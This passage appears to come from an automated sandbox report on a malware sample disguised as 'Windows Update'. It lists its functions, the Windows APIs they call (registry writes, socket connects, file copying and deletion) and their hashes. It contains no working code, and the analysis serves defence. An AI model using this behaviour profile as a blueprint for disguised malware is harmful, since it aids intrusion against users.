                                                                                                                    • Opcode Fuzzy Hash: 55978c70b02d00056b63ad9ce98e6f83aa1241efe75bc18e63a8b04ec52d3a59
                                                                                                                    • Instruction Fuzzy Hash: BA117CB2504600AFEB319E15CC81F66BBA8FF05720F1884AAED459A291E664E409CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05521D8A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05521DFC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3660427363-0
                                                                                                                    • Opcode ID: 4e745190ff176aeb3a7c187d5f750a1ba3f8b3dd6a109eb1afb7992a95801d12
                                                                                                                    • Instruction ID: 39a21a79d46119801d824e647e210617c5b539551173a6c2c0b174318da2cc3b
                                                                                                                    • Opcode Fuzzy Hash: 4e745190ff176aeb3a7c187d5f750a1ba3f8b3dd6a109eb1afb7992a95801d12
                                                                                                                    • Instruction Fuzzy Hash: 3C118172500A00AFEB31CF15DC80F67FBE8FF05720F14849AE9459B291D665E509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522772 Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessTimes.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055227D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessTimes
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1995159646-0
                                                                                                                    • Opcode ID: f299263ff779f011e65a3c9bc54230b15e6d1feda4a95b62c1dcc7cf5749b97e
                                                                                                                    • Instruction ID: 50a62be9c9f0675fbb2d2fec1adddac847f2940a692661834f70d42720614601
                                                                                                                    • Opcode Fuzzy Hash: f299263ff779f011e65a3c9bc54230b15e6d1feda4a95b62c1dcc7cf5749b97e
                                                                                                                    • Instruction Fuzzy Hash: 4311B276500700AFEB21CF65DC85F6AFBA8EF05720F18C4AAED458B291D675A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523D62 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05523DBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumModulesProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1082081703-0
                                                                                                                    • Opcode ID: a11a1eb48ed9852fbb56a067b77e6683eac2ae8089adb9fc01872f7e7bfd5d0b
                                                                                                                    • Instruction ID: 88f0327b671b189dc65bec85d88c77747c94c167fe949010512da2a7aa93a9da
                                                                                                                    • Opcode Fuzzy Hash: a11a1eb48ed9852fbb56a067b77e6683eac2ae8089adb9fc01872f7e7bfd5d0b
                                                                                                                    • Instruction Fuzzy Hash: BE11C471500244AFEB21CF59DC85FA6FBA8EF45720F14C8ABED459B281D678A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552306A Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAEventSelect.WS2_32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055230CE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EventSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 31538577-0
                                                                                                                    • Opcode ID: 4759487c51bac20f5c6bf6c8ee6c8328f2eacce53deed6fc52acaf9ec082542d
                                                                                                                    • Instruction ID: 724e922006089643ab3871015481c0c1fa7745de8910cf812dfa8cbb0f05e162
                                                                                                                    • Opcode Fuzzy Hash: 4759487c51bac20f5c6bf6c8ee6c8328f2eacce53deed6fc52acaf9ec082542d
                                                                                                                    • Instruction Fuzzy Hash: 9111B272500204AEEB21DF55DC85FA7FBECEF05320F1488ABED459B241D678A509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05524B82 Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05524BDE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CertCertificateChainPolicyVerify
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3930008701-0
                                                                                                                    • Opcode ID: 0ff37f38902617d5c2810a4f020bc039a9401070874e5532c26dd16445a432b2
                                                                                                                    • Instruction ID: 1ca6ba79e445136bae6aa868be9bb4092240acb4608a8b07a0c58a8083156d18
                                                                                                                    • Opcode Fuzzy Hash: 0ff37f38902617d5c2810a4f020bc039a9401070874e5532c26dd16445a432b2
                                                                                                                    • Instruction Fuzzy Hash: B611E271500200AFEF20CF29DC85F66FBA8EF05720F1488ABED499B291D6B5A408CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552598E Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegSetValueExW.KERNELBASE(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055259F8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3702945584-0
                                                                                                                    • Opcode ID: 7cb3474bbfd49890cd713818cf7e1dc6bbb150d35598fee6d22ab93d3d1c08e0
                                                                                                                    • Instruction ID: 24ae28c6540a1042744804c052a6e1dc81465df42b01fc2347be611110378d9d
                                                                                                                    • Opcode Fuzzy Hash: 7cb3474bbfd49890cd713818cf7e1dc6bbb150d35598fee6d22ab93d3d1c08e0
                                                                                                                    • Instruction Fuzzy Hash: D611DD72100600AFEB319F15CC81F66FBE8FF09720F14849AEE458A691D674E449CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 012BA5AF Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012BA61A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.358449792.00000000012BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_12ba000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 53979f0f599d06ab501e3030c3b138edeb4a9dcc06e4f0266c44071f585d8063
                                                                                                                    • Instruction ID: 5f22a8f83e09cebf0a4c095fae1cb87f61cd02336a46d4c2d5a41592c6b37171
                                                                                                                    • Opcode Fuzzy Hash: 53979f0f599d06ab501e3030c3b138edeb4a9dcc06e4f0266c44071f585d8063
                                                                                                                    • Instruction Fuzzy Hash: D1116D72409380AFDB228F55DC44A62FFF4EF4A610F0884DAEE858B262D275A518DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05525A4A Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05525AAB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: b6fbaaceeeaecd99d4a99896ffb27c7c50a6edccc3660e541dc6123f10058444
                                                                                                                    • Instruction ID: 5910d8fb49d7e88e46f04c9a5a62f1c8fd04a1b3d0d0f722624ffffac63941f2
                                                                                                                    • Opcode Fuzzy Hash: b6fbaaceeeaecd99d4a99896ffb27c7c50a6edccc3660e541dc6123f10058444
                                                                                                                    • Instruction Fuzzy Hash: 421193715093809FDB11CF25DC85B56BFE8EF06221F0884EAED45CF252E234A848CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05524C6A Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05524CC6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CertCertificateChainPolicyVerify
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3930008701-0
                                                                                                                    • Opcode ID: 731ed5925df3e15287955e870d50ff67dc8c13481a5c6f63b4b0cd740d7b2e55
                                                                                                                    • Instruction ID: cae7ec99d6fb9f99793ddf3480f51c2c377eabcd24105b73016d030f514ae186
                                                                                                                    • Opcode Fuzzy Hash: 731ed5925df3e15287955e870d50ff67dc8c13481a5c6f63b4b0cd740d7b2e55
                                                                                                                    • Instruction Fuzzy Hash: F011BF71500240AEEB21DF59DC81F66FBA8FF05720F1484AAED489B241D674A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522E86 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ioctlsocket.WS2_32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05522EDF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ioctlsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3577187118-0
                                                                                                                    • Opcode ID: 38d1ff60e4b4a2406ccc38de1f44c8c52b3e09d91b71b2ba475e850d09d998b2
                                                                                                                    • Instruction ID: 999b9944e4558c23e3b810df641352e2043e78e66954c23718e914d066a3f00b
                                                                                                                    • Opcode Fuzzy Hash: 38d1ff60e4b4a2406ccc38de1f44c8c52b3e09d91b71b2ba475e850d09d998b2
                                                                                                                    • Instruction Fuzzy Hash: E211C275404240AFEB31CF59DC85F66FBA8EF19720F18C8ABED459B281D674A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055225AA Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • shutdown.WS2_32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05522600
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: shutdown
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2510479042-0
                                                                                                                    • Opcode ID: c210a9f737124e327db1694b6c9655bbb15054424fef1b6fe86e2d2174eaa4f8
                                                                                                                    • Instruction ID: 95a746726303b1a8fb4b5bc630bcf6c17554168e554a4f349120710df3c0c051
                                                                                                                    • Opcode Fuzzy Hash: c210a9f737124e327db1694b6c9655bbb15054424fef1b6fe86e2d2174eaa4f8
                                                                                                                    • Instruction Fuzzy Hash: E811E575500240AFEB21CF15DC85F6AFBA8EF05720F14C4ABED459F291D678A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522942 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055229A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdaptersAddresses
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506852604-0
                                                                                                                    • Opcode ID: c65cf2b1518a7f93dd957e440b345fe8695f57ade347c599270d6ef75a930d4c
                                                                                                                    • Instruction ID: c20b024e240cc6a3d9a220e9846ae064925d51eebce6fababe056319ffbb7af6
                                                                                                                    • Opcode Fuzzy Hash: c65cf2b1518a7f93dd957e440b345fe8695f57ade347c599270d6ef75a930d4c
                                                                                                                    • Instruction Fuzzy Hash: D711E039000600AFEB318F15CC80FB6FBA8FF05720F14849BEE854A291C275A449CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552546A Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(?,00000E2C), ref: 055254D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: ebe076226857f20ac326629e3aaeb710d86b95d2f9b4ca1bbb05786605410980
                                                                                                                    • Instruction ID: 82854e0a976e1ea328b1821c336e7352a28e9c0f74b7d85e08eb6ddc29a00601
                                                                                                                    • Opcode Fuzzy Hash: ebe076226857f20ac326629e3aaeb710d86b95d2f9b4ca1bbb05786605410980
                                                                                                                    • Instruction Fuzzy Hash: 9511C231500640AEFB30DB19DC81F76FBA8EF05721F24849AED445E281E6A9A509CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552314E Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RasConnectionNotificationW.RASAPI32(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 055231A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectionNotification
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1402429939-0
                                                                                                                    • Opcode ID: 4d958f3008b5146f6ec6acb0744123e84285010dbb5ab6d0fe66cf801d7d5c51
                                                                                                                    • Instruction ID: cd90f875c9a68771062d03ffeba6eae0ec6b6c65692555eb955c2319ca1d7605
                                                                                                                    • Opcode Fuzzy Hash: 4d958f3008b5146f6ec6acb0744123e84285010dbb5ab6d0fe66cf801d7d5c51
                                                                                                                    • Instruction Fuzzy Hash: A211E171500604AFEB20CF15CC80F66FBA8FF16720F1488ABED445B281D678A409CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05522A3A Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,EA433468,00000000,00000000,00000000,00000000), ref: 05522A93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdapterInfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3405139893-0
                                                                                                                    • Opcode ID: 4d958f3008b5146f6ec6acb0744123e84285010dbb5ab6d0fe66cf801d7d5c51
                                                                                                                    • Instruction ID: 45668f7750f917752a289a65f2c93fdf923b75f7d9e2221d11bfadaffa6d590d
                                                                                                                    • Opcode Fuzzy Hash: 4d958f3008b5146f6ec6acb0744123e84285010dbb5ab6d0fe66cf801d7d5c51
                                                                                                                    • Instruction Fuzzy Hash: 6511CE79500600AEEB30CF15CC80F66FBA8FF15720F1884AAED445B681D6B4A409CBB2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05520FDB Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 0552103D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 431ac7efcc9c77ffbdd94d2ce8acc3eb79b28ecc55bd67faa6c706c1981fd8ab
                                                                                                                    • Instruction ID: 13fab69c1c690882738fd49c5b0207a24ff92a1f74db683b401db11b7f5ecadb
                                                                                                                    • Opcode Fuzzy Hash: 431ac7efcc9c77ffbdd94d2ce8acc3eb79b28ecc55bd67faa6c706c1981fd8ab
                                                                                                                    • Instruction Fuzzy Hash: AD1191714097C0AFDB228F15DC44A62FFB4EF1A220F08C4DEED854B563D265A918DB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05525CCA Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CopyFileW.KERNEL32(?,?,?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05525D12
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CopyFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1304948518-0
                                                                                                                    • Opcode ID: 53f10b1006ebe9768fa4cad8be766069ad0db391b0de0c8b20d1e275ed0705dd
                                                                                                                    • Instruction ID: ddf0b30ee85e0774b67ddffa08536e51d9fa18a3c902b9840a90b02f6fb348ad
                                                                                                                    • Opcode Fuzzy Hash: 53f10b1006ebe9768fa4cad8be766069ad0db391b0de0c8b20d1e275ed0705dd
                                                                                                                    • Instruction Fuzzy Hash: E2117C716002009FDB20DF29DC89B66FBE8FF05220F0884AADD49CF292E675E508CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05521558 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindClose.KERNEL32(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 055215AC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1863332320-0
                                                                                                                    • Opcode ID: 0bb887e4dafd61c3a781858efb8ff949c76254c0e2e04fc508f18635775b0cdf
                                                                                                                    • Instruction ID: 590dbc6f03e6271168d79a5851242909bfa48b8c600b3110a5aadf63494f70a0
                                                                                                                    • Opcode Fuzzy Hash: 0bb887e4dafd61c3a781858efb8ff949c76254c0e2e04fc508f18635775b0cdf
                                                                                                                    • Instruction Fuzzy Hash: 4F1186755097845FD7128F15DC84B56FFB4EF07221F18C0DFED858B292D265A908CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 055208B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 055208FD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 223599850-0
                                                                                                                    • Opcode ID: 7d106d26e3e987951372692a081b8147ce1a5ba234125a065bf43286963ff433
                                                                                                                    • Instruction ID: b963c7e3718c43260e28303c215aa489767b840ad407d9d41ffc29f7436ab850
                                                                                                                    • Opcode Fuzzy Hash: 7d106d26e3e987951372692a081b8147ce1a5ba234125a065bf43286963ff433
                                                                                                                    • Instruction Fuzzy Hash: FA11A1715052409FEB20CF25D888B66FBE8FF05620F08C4AADD458B6A2D375E408CFB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523A4A Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05523A96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3144859779-0
                                                                                                                    • Opcode ID: b28e59917ef97ad31cce86f29aadb4d0c52f046dbb257a9a1a6ab0fa131b852c
                                                                                                                    • Instruction ID: af47e4e0605660214a8b2a08de0fc3f430a1008650edd028d242629ae9ff85eb
                                                                                                                    • Opcode Fuzzy Hash: b28e59917ef97ad31cce86f29aadb4d0c52f046dbb257a9a1a6ab0fa131b852c
                                                                                                                    • Instruction Fuzzy Hash: 80117C31400600AFDB21CF55D884B66FBE5FF09310F08C8AADD868B662E375E458CF61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05525A6E Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05525AAB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 95650b973ac8b89b08d2899582ee7cfd1fe7b54f791cfec1fa3f45f149956e2d
                                                                                                                    • Instruction ID: cfde58e08ae1aa878c99df8c6cafd289c0b30b18a00234a9d5ee671dc6962af3
                                                                                                                    • Opcode Fuzzy Hash: 95650b973ac8b89b08d2899582ee7cfd1fe7b54f791cfec1fa3f45f149956e2d
                                                                                                                    • Instruction Fuzzy Hash: 66018C715002409FEB20CF29D886766FBE8FF09621F18C4AADD49CF682E675E408CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05523F6A Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 05523FBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 514040917-0
                                                                                                                    • Opcode ID: b9cf87055bef8fa9718b1969b9684e26f04867b3fcb448a33e06e7d64d17fb2c
                                                                                                                    • Instruction ID: 28300b8cbb734a0d315299819c1347773849919f589f07cdddc043f857fbfc31
                                                                                                                    • Opcode Fuzzy Hash: b9cf87055bef8fa9718b1969b9684e26f04867b3fcb448a33e06e7d64d17fb2c
                                                                                                                    • Instruction Fuzzy Hash: AB017C71900600ABD710DF1ADC86B26FBA8EF88B20F14816AED089B741E235F915CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0552163E Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNEL32(?,EA433468,00000000,?,?,?,?,?,?,?,?,72343C38), ref: 05521678
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.360095276.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_5520000_Windows Update.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 7acbef2f745f0dffa2213fc7398d24f919b35b6bab84e7f1b6f529638a3a9eb2
